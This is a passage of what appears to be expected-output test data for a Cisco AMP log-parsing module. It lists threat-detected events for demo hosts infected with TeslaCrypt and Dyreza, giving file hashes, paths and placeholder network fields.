+ "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196244", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 209000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 15892, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196243", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17217, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196242", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 147000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 18542, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196241", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 19867, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196240", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 21191, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259080131182683", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 996000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259080131183000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 22515, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251507855228943", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 944000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 23834, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 8000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 25159, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261640", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 821000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26489, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261639", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27769, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261638", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 29385, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261637", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 680000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 30665, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261636", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 665000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 32281, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261635", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 509000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 33561, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259028591575130", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 984000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259028591575000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 35128, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251439135752194", 